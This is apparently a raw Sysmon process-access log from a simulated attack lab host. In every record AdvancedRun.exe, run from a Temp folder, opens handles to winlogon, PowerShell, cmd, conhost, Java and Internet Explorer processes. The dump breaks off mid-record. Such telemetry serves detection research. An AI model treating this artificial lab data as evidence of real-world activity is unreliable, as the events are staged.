AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004076002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.580{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004076001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004076000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.576{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.576{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
